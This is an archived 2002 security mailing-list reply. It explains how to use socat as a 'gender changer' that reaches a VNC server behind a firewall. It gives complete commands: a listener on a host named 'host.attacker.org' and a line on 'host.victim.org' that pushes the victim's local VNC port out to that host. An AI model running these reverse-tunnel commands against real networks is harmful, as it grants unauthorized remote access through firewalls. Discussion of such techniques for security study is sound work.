[sorry if double] You might use socat from http://www.dest-unreach.org/socat/ as "gender changer". On your outside server host.attacker.org run it as double server: socat tcp-l:80 tcp-l:5900 or, for multiple connections, with access restrictions, logging etc: socat -d -d tcp-l:80,fork,range=host.victim.org/24,reuseaddr tcp-l:5900,range=localhost/32,reuseaddr and on host.victim.org: socat tcp:localhost:5900 tcp:host.attacker.org:80 This scenario was one of socats design goals, after I had to realize that netcat with its derivatives and the usual port forwarders could not easily be used for things like these. regards Gerhard Rieger Ivan Buetler wrote: > Hi there, > > The following article will discuss bidirectional inside-out attacks, > inspired > from netcat. The article discusses how to access a victims VNC server > behind > a firewall, where the victim initiates connectons to the attacker. > > http://www.csnc.ch/downloads/docs/techdocs/TCP-IP_GenderChanger_CSNC_V1.0.pdf ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Wed Jul 31 2002 - 14:30:35 PDT